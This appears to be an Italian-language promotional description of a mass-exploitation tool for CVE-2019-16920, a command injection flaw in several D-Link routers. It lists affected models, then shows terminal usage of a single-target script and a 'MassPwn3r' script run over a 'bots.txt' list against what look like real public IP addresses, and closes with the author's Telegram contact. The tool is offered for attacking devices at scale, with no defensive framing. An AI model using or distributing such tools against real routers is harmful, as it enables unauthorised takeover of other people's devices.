
Strumento automatizzato di sfruttamento di massa per la vulnerabilità di command injection CVE-2019-16920 in più router D-Link, che consente l'esecuzione remota di codice non autenticata.
La vulnerabilità è stata trovata nell'ultimo firmware dei seguenti prodotti D-Link: DIR-655 DIR-866L DIR-652 DHP-1565
L'esecuzione di codice remoto non autenticata si verifica nei prodotti D-Link come DIR-655C, DIR-866L, DIR-652 e DHP-1565. Il problema si verifica quando l'attaccante invia un input arbitrario a un'interfaccia gateway comune del dispositivo "PingTest" che potrebbe portare a un'iniezione comune. Un attaccante che riesce a innescare l'iniezione di comandi può ottenere il pieno compromesso del sistema. Successivamente, è stato scoperto in modo indipendente che anche questi sono affetti: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 e DIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18